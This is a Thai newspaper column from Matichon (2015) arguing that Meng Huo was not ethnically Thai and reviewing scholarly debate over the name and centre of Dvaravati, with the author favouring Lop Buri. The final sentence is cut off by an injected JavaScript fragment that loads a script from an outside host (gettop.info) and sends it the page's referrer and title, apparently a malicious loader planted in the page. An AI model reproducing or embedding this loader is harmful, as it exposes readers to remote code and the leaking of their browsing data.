มติชนรายวัน ฉบับประจำวันพฤหัสบดีที่ 17 กันยาน 2558

 

เบ้งเฮ็ก ไม่ไทย

       นักการเมืองบางคนบางฝ่ายวิพากษ์วิจารณ์รัฐบาลหลายครั้งหลายหน จึงถูกเชิญชวนไปอยู่ในที่รโหฐานเพื่อปรับทัศนคติ

       นายกฯ บอกว่ารัฐบาลให้อภัยด้วยความเมตตา เสมือนสามก๊กเมื่อขงเบ้งทำการยุทธ์จับเบ้งเฮ็กได้หลายครั้ง ก็ปล่อยตัวทุกครั้ง จนเบ้งเฮ็กยอมแพ้เอง

       เบ้งเฮ็ก ถูกสร้างใหม่ให้เป็นชนชาติไทยอยู่ในยูนนาน สืบเนื่องจากประวัติศาสตร์แห่งชาติของไทยเรื่องบรรพชนคนไทยมีถิ่นกำเนิดอยู่เทือกเขาอัลไต แล้วถูกรุกรานต้องอพยพถอนรากถอนโคนลงมาตั้งอาณาจักรน่านเจ้า แถบเหนือๆของยูนนาน

       กรมศิลปากรเคยผลิตตำราเครื่องดนตรีไทย เล่าว่ามโหระทึกเป็นเครื่องประโคมทำจากโลหะ ประดิษฐ์โดยขงเบ้ง ใช้เป็นเครื่องมือทำอุบายรบชนะเบ้งเฮ็ก ซึ่งเป็นชนชาติไทย [หนังสือ เครื่องดนตรีไทย ของ ธนิต อยู่โพธิ์ พิมพ์ครั้งแรก พ.ศ. 2500]

       แต่นักประวัติศาสตร์โบราณคดีระดับสากล เป็นที่รับรู้ทั่วกันว่าเบ้งเฮ็กไม่ใช่ชนชาติไทย แต่เป็นคนพื้นเมือง จัดอยู่ในตระกูลภาษาจีน-ทิเบต ฯลฯ ซึ่งเป็นประชากรส่วนสำคัญของคนในน่านเจ้า ที่ฮั่นเรียก“หมาน” หมายถึง คนป่าเถื่อนทางทิศใต้

 

ทวารวดี มาจากไหน?

       โถโลโปตี เป็นคำในเอกสารจีน ระหว่าง พ.ศ. 1214-1236 เรียกดินแดนแห่งหนึ่งทางตะวันออกของอินเดีย (และถัดไปทางตะวันออกของชื่ออีก 2 ชื่อ)

       นักค้นคว้าชาวยุโรปมีความเห็น 2 เรื่อง ได้แก่ (1.) โถโลโปตี อยู่ในไทย บริเวณภาคกลาง ลุ่มน้ำเจ้าพระยา (2.) โถโลโปตี ตรงกับ ทวารวดี

       [จะไม่อธิบายรายละเอียดเหตุผล ที่นักค้นคว้าชาวยุโรปมีความเห็นอย่างนั้น]

       ต่อมา นักวิชาการส่วนมากเชื่อตรงกันว่าโถโลโปตีตรงกับทวารวดี เป็นชื่อศักดิ์สิทธิ์อยู่ในมหาภารตยุทธ์

       แต่ยังไม่ยุติ ใครจะมีความเห็นต่างอีกก็ได้ ไม่มีข้อห้าม (ยกเว้นอาจารย์อำนาจนิยมจะห้ามคิดต่าง)

       ศูนย์กลางอยู่ที่ไหน? ของทวารวดี (หรือโถโลโปตี) นักวิชาการมีความเห็นต่างกัน ดังนี้

       (1.) เชื่อว่าอยู่ที่เมืองโบราณ อ. เมืองฯ จ. นครปฐม (2.) เชื่อว่าอยู่ที่เมืองโบราณ อ. เมืองฯ จ. ลพบุรี

       สรุปแล้วทุกอย่างไม่มีข้อยุติ ทั้งชื่อและที่ตั้งของศูนย์กลางทวารวดี (มีรายละเอียดใน สุวรรณภูมิในอาเซียน มติชนฉบับวันนี้ หน้า 17)

       ครูบาอาจารย์ในสถาบันการศึกษาทุกระดับ ควรซื่อสัตย์ต่อข้อมูล ขณะเดียวกันก็ควรซื่อสัตย์ต่อตนเองและผู้อื่น ไม่เสนอข้อมูลด้านเดียวของตนให้นักเรียนนักศึกษาท่องจำโดยตัดทอนความเห็นทางวิชาการของกลุ่มอื่น ทั้งนี้เพื่อให้แต่ละคนตัดสินใจเลือกเชื่อด้วยตนเอง

       ผมเลื่อมใสความเห็นของนักวิชาการฝ่ายที่เชื่อว่าทวารวดี (โถโลโปตี) อยู่ จ. ลพบุรี

       เพราะนอกจากมีโบราณศิลปวัตถุสถานยุคทวารวดีแล้ว ยังมีความต่อเนื่องเป็นอยุธยา ที่มีวงศ์กษัตริย์ว่า“รามาธิบดี” และชื่อ“ทวารวดี”อยู่ในนามเมืองทางการว่า“กรุงเทพทวารวดีศรีอยุธยา” สืบถึงกรุงธนบุรีและกรุงเทพฯทุกวันนี้

       แต่ยังไม่พบความสืบเนื่องอย่างเดียวกันจาก จ. นครปฐม}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;